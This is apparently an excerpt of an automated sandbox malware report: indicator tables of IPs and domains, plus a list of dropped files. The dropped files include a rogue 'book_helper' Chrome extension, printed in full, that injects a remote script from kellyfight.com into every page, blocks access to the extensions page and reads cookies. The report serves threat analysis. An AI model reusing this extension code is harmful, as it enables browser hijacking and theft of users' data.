                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    19:21:07API Interceptor9x Sleep call for process: IpB8f8qwze.exe modified
                                                                                                                                    19:21:15API Interceptor10x Sleep call for process: 83C12B0D0FA88B10.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    104.21.6.78Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 9a3a97f6f45f2c2b.com/info_old/du
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 9a3a97f6f45f2c2b.com/info_old/w
                                                                                                                                    172.67.134.157Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 9a3a97f6f45f2c2b.com/info_old/w
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 9A3A97F6F45F2C2B.com/info_old/ddd

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    9a3a97f6f45f2c2b.comSetup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    9A3A97F6F45F2C2B.comSetup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    CLOUDFLARENETUSUsF26PCa3m.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.63.50
                                                                                                                                    PRODUCT CTG. ORDER.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    1254515.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    microsoft_shared.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    Receipt.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 172.67.160.246
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.134.233
                                                                                                                                    transferir copia_03_05.exeGet hashmaliciousBrowse
                                                                                                                                    • 23.227.38.74
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    IrN6nQQw3Q.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.62.50
                                                                                                                                    Avenge1.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.190.5
                                                                                                                                    Paladin.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.26.2.115
                                                                                                                                    GRN03546290_SC8290.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    Shipment Notification 9073784422.pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    Property Information.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.21.31.39
                                                                                                                                    Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    INV-UR407235.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    SWFTMSG04032021.docGet hashmaliciousBrowse
                                                                                                                                    • 172.67.208.139
                                                                                                                                    SecuriteInfo.com.W32.Bulz.3814tr.24841.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    CLOUDFLARENETUSUsF26PCa3m.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.63.50
                                                                                                                                    PRODUCT CTG. ORDER.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    1254515.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    microsoft_shared.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68
                                                                                                                                    Receipt.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 172.67.160.246
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Setup.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.134.157
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.134.233
                                                                                                                                    transferir copia_03_05.exeGet hashmaliciousBrowse
                                                                                                                                    • 23.227.38.74
                                                                                                                                    Byron_Distributors_PO_LED-Strips-Lighting.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    IrN6nQQw3Q.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.17.62.50
                                                                                                                                    Avenge1.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.190.5
                                                                                                                                    Paladin.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.26.2.115
                                                                                                                                    GRN03546290_SC8290.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    Shipment Notification 9073784422.pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.67.188.154
                                                                                                                                    Property Information.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.21.31.39
                                                                                                                                    Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.159.135.233
                                                                                                                                    INV-UR407235.xlsxGet hashmaliciousBrowse
                                                                                                                                    • 162.159.133.233
                                                                                                                                    SWFTMSG04032021.docGet hashmaliciousBrowse
                                                                                                                                    • 172.67.208.139
                                                                                                                                    SecuriteInfo.com.W32.Bulz.3814tr.24841.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.20.185.68

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSI75EE.tmpSetup.exeGet hashmaliciousBrowse
                                                                                                                                      Setup.exeGet hashmaliciousBrowse
                                                                                                                                        tyxCV1ouryr7.exeGet hashmaliciousBrowse
                                                                                                                                          fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                            6MhmlD8KZh.exeGet hashmaliciousBrowse
                                                                                                                                              fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                                Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                  N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                    Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                      N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                        FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                          FileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Cookies1615173735640
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.698304057893793
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Cookies1615173776790
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.698304057893793
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\background.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):886
                                                                                                                                                            Entropy (8bit):5.022683940423506
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                            MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                            SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                            SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                            SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\book.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):152
                                                                                                                                                            Entropy (8bit):5.039480985438208
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                            MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                            SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                            SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                            SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon.png
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1161
                                                                                                                                                            Entropy (8bit):7.79271055262892
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                            MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                            SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                            SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                            SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon48.png
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2235
                                                                                                                                                            Entropy (8bit):7.880518016071819
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                            MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                            SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                            SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                            SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):93637
                                                                                                                                                            Entropy (8bit):5.292996107428883
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                            MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                            SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                            SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                            SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\manifest.json
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2380
                                                                                                                                                            Entropy (8bit):5.687293760500434
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                            MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                            SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                            SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                            SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.html
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):280
                                                                                                                                                            Entropy (8bit):5.048307538221611
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                            MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                            SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                            SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                            SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):642
                                                                                                                                                            Entropy (8bit):4.985939227199713
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                            MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                            SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                            SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                            SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5361
                                                                                                                                                            Entropy (8bit):5.18523361452614
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:nYrRT/Xrspi863rIV7Sk0JCKL8xF7bOEQVuwv:nYrd/t863rI9U4Kh
                                                                                                                                                            MD5:E85C8BFB1AA873B81991F3A93BC01A60
                                                                                                                                                            SHA1:AE68D1B6C2AD4F13905661F5EFD2E82EB9B097C6
                                                                                                                                                            SHA-256:3E456F0A84F60710BD3B7E269683BB131762132E42F91FA17FB24E0758B91D48
                                                                                                                                                            SHA-512:F1C0EB6C6F23CF9013350995C0DD0C48277F28227047A1432A7025D8944E755EF2AB75D1733288C780A677648C079AA17090F7767626A04187936BEB43AF024E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245950583460399","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245950583260338","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245950640095768","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1538886"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34636
                                                                                                                                                            Entropy (8bit):5.539363655448566
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:nEaf7D2XLl6y1kXqKf/pUZNCgVLH2HfjrUkG1UckPWdr+ZnCSvc:lqLvjV4n6
                                                                                                                                                            MD5:45D161FF46036E874E96C158B98503B0
                                                                                                                                                            SHA1:4A9B8AE785694C38605CBBAAF7AE4B14C28896D7
                                                                                                                                                            SHA-256:B7115F44F77E77858E2A5BCA842089BF1ABC6C8BF37D4CEEFD7E12061B989CBA
                                                                                                                                                            SHA-512:B808D3509DDC79B3A4E8B5479C3D65A61C05A35D9C9011DC21EB78B6EF5A3A02ADB7CA58E2F97904E732DE04D04DF9FE6C817606E1A491708758028D19AC52EC
                                                                                                                                                            Malicious:true
